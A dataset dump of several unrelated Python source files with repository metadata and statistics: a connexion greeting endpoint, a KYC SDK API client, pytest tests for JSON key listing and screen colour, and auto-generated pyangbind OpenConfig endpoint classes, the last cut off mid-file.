e21de50ac69fdc7b85e83308fb7a303edbdb6801
| 826
|
py
|
Python
|
test_performance/load_server/controllers/teste_controller_async.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2021-10-14T07:27:47.000Z
|
2021-10-14T07:27:47.000Z
|
test_performance/load_server/controllers/teste_controller_async.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 4
|
2019-08-06T02:26:32.000Z
|
2021-06-10T21:39:19.000Z
|
test_performance/load_server/controllers/teste_controller_async.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2018-05-11T18:04:41.000Z
|
2018-05-11T18:04:41.000Z
|
def get_hello(name: str) -> tuple: # noqa: E501
"""
# noqa: E501
:param name:
:type name: str
:rtype: None
"""
return {"response": f" ola {name}. bem vindo ao clube"}, 200
# import aiohttp
# from connexion.lifecycle import ConnexionResponse
# async def get_hello(name: str) -> tuple: # noqa: E501
# """
# # noqa: E501
# :param name:
# :type name: str
# :rtype: None
# """
# return aiohttp.web.json_response(
# {"response": f" ola {name}. bem vindo ao clube"}, 200
# )
# async def get_hello(name: str) -> tuple: # noqa: E501
# """
# # noqa: E501
# :param name:
# :type name: str
# :rtype: None
# """
# return aiohttp.web.json_response(
# {"response": f" ola {name}. bem vindo ao clube"}, 200
# )
| 18.355556
| 64
| 0.533898
| 98
| 826
| 4.44898
| 0.306122
| 0.09633
| 0.075688
| 0.103211
| 0.866972
| 0.866972
| 0.866972
| 0.866972
| 0.866972
| 0.788991
| 0
| 0.047285
| 0.308717
| 826
| 45
| 65
| 18.355556
| 0.716287
| 0.762712
| 0
| 0
| 0
| 0
| 0.276596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e23876dfd67852c5d0bb2e1f1388732ee9ca0868
| 76
|
py
|
Python
|
rgbd_seg/loggers/__init__.py
|
tomchol/ShapeConv
|
41ead20854daed43b59ef978665fa53f113cbb65
|
[
"Apache-2.0"
] | 57
|
2021-08-03T08:03:56.000Z
|
2022-03-25T12:17:44.000Z
|
rgbd_seg/loggers/__init__.py
|
tomchol/ShapeConv
|
41ead20854daed43b59ef978665fa53f113cbb65
|
[
"Apache-2.0"
] | 6
|
2021-08-30T10:06:46.000Z
|
2022-03-08T12:47:20.000Z
|
rgbd_seg/loggers/__init__.py
|
tomchol/ShapeConv
|
41ead20854daed43b59ef978665fa53f113cbb65
|
[
"Apache-2.0"
] | 8
|
2021-08-13T08:32:54.000Z
|
2022-03-25T11:12:13.000Z
|
from .builder import build_logger
from .builder import build_summarys_writer
| 38
| 42
| 0.881579
| 11
| 76
| 5.818182
| 0.636364
| 0.34375
| 0.53125
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092105
| 76
| 2
| 42
| 38
| 0.927536
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e2399a0115b6732db1be06cd443b1e0905146ec7
| 3,445
|
py
|
Python
|
ost_kyc_sdk_python/saas/users_kyc.py
|
OpenSTFoundation/kyc-sdk-python
|
095d789e11a48a1578c73370cf88170196e7ebae
|
[
"MIT"
] | 13
|
2019-02-27T14:38:30.000Z
|
2019-02-28T15:44:36.000Z
|
ost_kyc_sdk_python/saas/users_kyc.py
|
ostdotcom/ost-kyc-sdk-python
|
095d789e11a48a1578c73370cf88170196e7ebae
|
[
"MIT"
] | null | null | null |
ost_kyc_sdk_python/saas/users_kyc.py
|
ostdotcom/ost-kyc-sdk-python
|
095d789e11a48a1578c73370cf88170196e7ebae
|
[
"MIT"
] | 2
|
2018-12-14T07:31:57.000Z
|
2018-12-26T21:42:46.000Z
|
from .base import Base
class UsersKYC(Base):
def __init__(self, params):
Base.__init__(self, params)
self.endpoint = '/api/v2/users-kyc'
#
# Submit KYC
# * Author: Mayur
# * Date: 20/11/2018
# * Reviewed By:
#
# Return dict
#
def submit_kyc(self, params):
self.raise_exception_if_param_absent_or_invalid(params, 'user_id')
endpoint = self.endpoint + "/" + str(params.get('user_id'))
self.delete_key_from_params(params, 'user_id')
return self.http_helper.send_post_request(endpoint, params)
#
# Get user's KYC information, in params user_id is mandatory parameter
# * Author: Mayur
# * Date: 20/11/2018
# * Reviewed By:
#
# Return dict
#
def get(self, params=None):
params = params or {}
self.raise_exception_if_param_absent_or_invalid(params, 'user_id')
endpoint = self.endpoint + "/" + str(params.get('user_id'))
self.delete_key_from_params(params, 'user_id')
return self.http_helper.send_get_request(endpoint, params)
#
# Return list of user's KYC information
# * Author: Mayur
# * Date: 20/11/2018
# * Reviewed By:
#
# Return dict
#
def list(self, params=None):
params = params or {}
return self.http_helper.send_get_request(self.endpoint, params)
#
# Get presigned url for PUT request
# * Author: Mayur
# * Date: 20/11/2018
# * Reviewed By:
#
# Return dict
#
def get_pre_signed_url_put(self, params):
suffix = "/pre-signed-urls/for-put"
return self.http_helper.send_get_request(
self.endpoint + suffix, params)
#
# Get presigned url for POST request
# * Author: Mayur
# * Date: 20/11/2018
# * Reviewed By:
#
# Return dict
#
def get_pre_signed_url_post(self, params):
suffix = "/pre-signed-urls/for-post"
return self.http_helper.send_get_request(
self.endpoint + suffix, params)
#
# Email KYC approve
# * Author: Mayur
# * Date: 14/12/2018
# * Reviewed By:
#
# Return dict
#
def email_approve(self, params):
self.raise_exception_if_param_absent_or_invalid(params, 'user_id')
endpoint = self.endpoint + "/" + str(params.get('user_id')) + '/email/approve'
self.delete_key_from_params(params, 'user_id')
return self.http_helper.send_post_request(endpoint, params)
#
# Email KYC deny
# * Author: Mayur
# * Date: 14/12/2018
# * Reviewed By:
#
# Return dict
#
def email_deny(self, params):
self.raise_exception_if_param_absent_or_invalid(params, 'user_id')
endpoint = self.endpoint + "/" + str(params.get('user_id')) + '/email/deny'
self.delete_key_from_params(params, 'user_id')
return self.http_helper.send_post_request(endpoint, params)
#
# Email report issue email
# * Author: Mayur
# * Date: 14/12/2018
# * Reviewed By:
#
# Return dict
#
def email_report_issue (self, params):
self.raise_exception_if_param_absent_or_invalid(params, 'user_id')
endpoint = self.endpoint + "/" + str(params.get('user_id')) + '/email/report-issue'
self.delete_key_from_params(params, 'user_id')
return self.http_helper.send_post_request(endpoint, params)
| 28.00813
| 92
| 0.609869
| 428
| 3,445
| 4.661215
| 0.156542
| 0.04812
| 0.066165
| 0.080201
| 0.839098
| 0.818045
| 0.789975
| 0.752882
| 0.752882
| 0.729825
| 0
| 0.02601
| 0.274601
| 3,445
| 122
| 93
| 28.237705
| 0.772309
| 0.215965
| 0
| 0.52381
| 0
| 0
| 0.083491
| 0.018596
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.02381
| 0
| 0.452381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e266410f2403d5d666d6f8cfba6a8b48f28c7101
| 2,256
|
py
|
Python
|
tests/test_listkeys.py
|
json-transformations/jsonls
|
5f5ac2c84fb165e54da075e9244c71581808262e
|
[
"MIT"
] | null | null | null |
tests/test_listkeys.py
|
json-transformations/jsonls
|
5f5ac2c84fb165e54da075e9244c71581808262e
|
[
"MIT"
] | null | null | null |
tests/test_listkeys.py
|
json-transformations/jsonls
|
5f5ac2c84fb165e54da075e9244c71581808262e
|
[
"MIT"
] | null | null | null |
from jsonls.core import get_keylists, get_keystrings
def test_get_simple_keylists():
data = {"status": "success", "message": {"affenpinscher": []}}
expect = [
(),
('message',),
('message', 'affenpinscher','*'),
('status',)
]
result = sorted(get_keylists(data))
assert result == expect
def test_get_nested_keylists():
data = {"Solar System": {"planets": [{"name": "Mars", "moons": [{"name":
"Phobos", "craters": [{"name": "Clustril", "diameter (km)": 3.4}, {
"name": "D'Arrest", "diameter (km)": 2.1}]}]}]}}
expect = [
(),
('Solar System',),
('Solar System', 'planets', '*'),
('Solar System', 'planets', '*', 'moons', '*'),
('Solar System', 'planets', '*', 'moons', '*', 'craters', '*'),
('Solar System', 'planets', '*', 'moons', '*', 'craters', '*',
'diameter (km)'),
('Solar System', 'planets', '*', 'moons', '*', 'craters', '*', 'name'),
('Solar System', 'planets', '*', 'moons', '*', 'name'),
('Solar System', 'planets', '*', 'name')
]
result = sorted(get_keylists(data))
for i in result:
print(i)
assert result == expect
def test_get_simple_keystrings():
data = {"status": "success", "message": {"affenpinscher": []}}
expect = [
'.',
'.message',
'.message.affenpinscher.*',
'.status'
]
result = list(get_keystrings(data))
assert result == expect
def test_get_nested_keystrings():
data = {"Solar System": {"planets": [{"name": "Mars", "moons": [{"name":
"Phobos", "craters": [{"name": "Clustril", "diameter (km)": 3.4},
{"name": "D'Arrest", "diameter (km)": 2.1}]}]}]}}
expect = [
'.',
'.Solar System',
'.Solar System.planets.*',
'.Solar System.planets.*.moons.*',
'.Solar System.planets.*.moons.*.craters.*',
'.Solar System.planets.*.moons.*.craters.*.diameter (km)',
'.Solar System.planets.*.moons.*.craters.*.name',
'.Solar System.planets.*.moons.*.name',
'.Solar System.planets.*.name'
]
result = list(get_keystrings(data))
print(result)
print(expect)
assert result == expect
| 32.695652
| 79
| 0.511525
| 210
| 2,256
| 5.409524
| 0.2
| 0.174296
| 0.253521
| 0.202465
| 0.859155
| 0.792254
| 0.767606
| 0.767606
| 0.700704
| 0.700704
| 0
| 0.004753
| 0.253989
| 2,256
| 68
| 80
| 33.176471
| 0.670232
| 0
| 0
| 0.333333
| 0
| 0
| 0.37367
| 0.094858
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0.066667
| false
| 0
| 0.016667
| 0
| 0.083333
| 0.05
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e2a17ec49d5024de9f91d125a69780e02d80b6e5
| 133
|
py
|
Python
|
src/tests/test_weather.py
|
pckltr/Pi_Weather_Station
|
6222b4ed77e92096bbed6fea3f8603e27e76bf30
|
[
"MIT"
] | 9
|
2019-05-12T17:43:39.000Z
|
2021-12-04T19:20:02.000Z
|
src/tests/test_weather.py
|
pckltr/Pi_Weather_Station
|
6222b4ed77e92096bbed6fea3f8603e27e76bf30
|
[
"MIT"
] | 2
|
2019-11-02T21:10:35.000Z
|
2020-02-07T10:30:16.000Z
|
src/tests/test_weather.py
|
pckltr/Pi_Weather_Station
|
6222b4ed77e92096bbed6fea3f8603e27e76bf30
|
[
"MIT"
] | 6
|
2019-05-22T14:32:01.000Z
|
2021-12-25T18:28:13.000Z
|
import pytest
from src.weather import set_screen_color
def test_set_screen_color():
assert set_screen_color(25) == [0, 0, 155]
| 19
| 46
| 0.759398
| 22
| 133
| 4.272727
| 0.636364
| 0.287234
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061947
| 0.150376
| 133
| 6
| 47
| 22.166667
| 0.769912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2c7f3eb86e4c0ff3e0cca16a82a82efd2b1aa919
| 39,868
|
py
|
Python
|
napalm_yang/models/openconfig/network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import config
from . import state
from . import local_
from . import remote
class endpoint(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/connection-points/connection-point/endpoints/endpoint. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: A list of the endpoints (interfaces or remote
connection points that can be used for this
connection point). The active endpoint is selected
based on the precedence that it is configured
with
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__endpoint_id",
"__config",
"__state",
"__local_",
"__remote",
)
_yang_name = "endpoint"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__endpoint_id = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
self.__config = YANGDynClass(
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__local_ = YANGDynClass(
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__remote = YANGDynClass(
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"connection-points",
"connection-point",
"endpoints",
"endpoint",
]
def _get_endpoint_id(self):
"""
Getter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
YANG Description: A pointer to the configured identifier for the
endpoint
"""
return self.__endpoint_id
def _set_endpoint_id(self, v, load=False):
"""
Setter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
If this variable is read-only (config: false) in the
source YANG file, then _set_endpoint_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_endpoint_id() directly.
YANG Description: A pointer to the configured identifier for the
endpoint
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError(
"Cannot set keys directly when" + " within an instantiated list"
)
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """endpoint_id must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="endpoint-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='leafref', is_config=True)""",
}
)
self.__endpoint_id = t
if hasattr(self, "_set"):
self._set()
def _unset_endpoint_id(self):
self.__endpoint_id = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
YANG Description: Configuration parameters relating to the
endpoint
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: Configuration parameters relating to the
endpoint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """config must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__config = t
if hasattr(self, "_set"):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
YANG Description: Operational state parameters relating to the
endpoint
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: Operational state parameters relating to the
endpoint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_local_(self):
"""
Getter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
YANG Description: Configuration and operational state parameters
relating to a local interface
"""
return self.__local_
def _set_local_(self, v, load=False):
"""
Setter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_ is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_() directly.
YANG Description: Configuration and operational state parameters
relating to a local interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """local_ must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=local_.local_, is_container='container', yang_name="local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__local_ = t
if hasattr(self, "_set"):
self._set()
def _unset_local_(self):
self.__local_ = YANGDynClass(
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_remote(self):
"""
Getter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
YANG Description: Configuration and operational state parameters
relating to a remote interface
"""
return self.__remote
def _set_remote(self, v, load=False):
"""
Setter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote() directly.
YANG Description: Configuration and operational state parameters
relating to a remote interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """remote must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=remote.remote, is_container='container', yang_name="remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__remote = t
if hasattr(self, "_set"):
self._set()
def _unset_remote(self):
self.__remote = YANGDynClass(
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
endpoint_id = __builtin__.property(_get_endpoint_id, _set_endpoint_id)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
local_ = __builtin__.property(_get_local_, _set_local_)
remote = __builtin__.property(_get_remote, _set_remote)
_pyangbind_elements = OrderedDict(
[
("endpoint_id", endpoint_id),
("config", config),
("state", state),
("local_", local_),
("remote", remote),
]
)
from . import config
from . import state
from . import local_
from . import remote
class endpoint(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/connection-points/connection-point/endpoints/endpoint. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: A list of the endpoints (interfaces or remote
connection points that can be used for this
connection point). The active endpoint is selected
based on the precedence that it is configured
with
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__endpoint_id",
"__config",
"__state",
"__local_",
"__remote",
)
_yang_name = "endpoint"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__endpoint_id = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
self.__config = YANGDynClass(
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__local_ = YANGDynClass(
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__remote = YANGDynClass(
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"connection-points",
"connection-point",
"endpoints",
"endpoint",
]
def _get_endpoint_id(self):
"""
Getter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
YANG Description: A pointer to the configured identifier for the
endpoint
"""
return self.__endpoint_id
def _set_endpoint_id(self, v, load=False):
"""
Setter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
If this variable is read-only (config: false) in the
source YANG file, then _set_endpoint_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_endpoint_id() directly.
YANG Description: A pointer to the configured identifier for the
endpoint
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError(
"Cannot set keys directly when" + " within an instantiated list"
)
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """endpoint_id must be of a type compatible with leafref""",
"defined-type": "leafref",
